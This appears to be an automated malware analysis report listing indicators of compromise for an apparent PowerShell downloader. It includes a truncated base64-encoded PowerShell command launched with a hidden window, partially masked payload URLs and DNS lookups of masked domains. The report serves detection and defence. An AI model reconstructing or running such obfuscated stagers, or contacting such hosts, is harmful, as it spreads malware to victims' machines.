Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAbABmAHkAZgA4AD0AKAAnAFAAZgAnACsAJwA2AGwAOAB2ACcAKwAnAHoAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBuAHYAOgB0AEUAbQBwAFwAbwBmAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://gu##any.net/zefiro/gSI5r781/
- http://be####roup.com.au/3GrPP0533/
- DNS ASK ja#####lonefabrics.com
- DNS ASK in##yog.com
- DNS ASK 88###liu.com
- DNS ASK gu##any.net
- DNS ASK th####studio.com
- DNS ASK be####roup.com.au
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAbABmAHkAZgA4AD0AKAAnAFAAZgAnACsAJwA2AGwAOAB2ACcAKwAnAHoAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBuAHYAOgB0AEUAbQBwAFwAbwBmAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (with hidden window)